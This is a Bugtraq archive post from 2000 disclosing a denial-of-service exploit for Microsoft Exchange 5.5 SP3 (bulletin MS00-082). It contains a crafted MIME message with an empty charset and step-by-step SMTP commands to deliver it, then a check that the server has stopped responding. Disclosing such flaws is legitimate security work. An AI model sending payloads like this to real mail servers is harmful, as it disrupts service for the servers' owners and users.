Home page logo

bugtraq logo Bugtraq mailing list archives

Exploit scenario: Microsoft Security Bulletin (MS00-082)
From: Art Savelev <asavelev () ENI-NET COM>
Date: Fri, 10 Nov 2000 15:49:51 -0500

The following body of the e-mail message causes Microsoft Exchange 5.5
SP3 Internet Mail Service and Information Store to crash
Refer to Microsoft Security Bulletin (MS00-082)
Patch is available here:

The source of the problem is charset = ""


MIME-Version: 1.0

Content-Type: multipart/alternative;

     boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk

Content-Type: text/plain;

        charset = ""

Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

1) Connect to 25th port of server (SMTP)
2) Enter (paste) following text:


MAIL FROM: myself () myserver com

RCPT TO: administrator


3) Now paste the body I gave
4) Type <CRLF>.<CRLF> (that is Enter-dot-Enter)
5) Type quit
6) Wait a little, and try to connect to 25th port again to verify - it
shouldn't work.

Art Savelev

  By Date           By Thread  

Current thread:
  • Exploit scenario: Microsoft Security Bulletin (MS00-082) Art Savelev (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]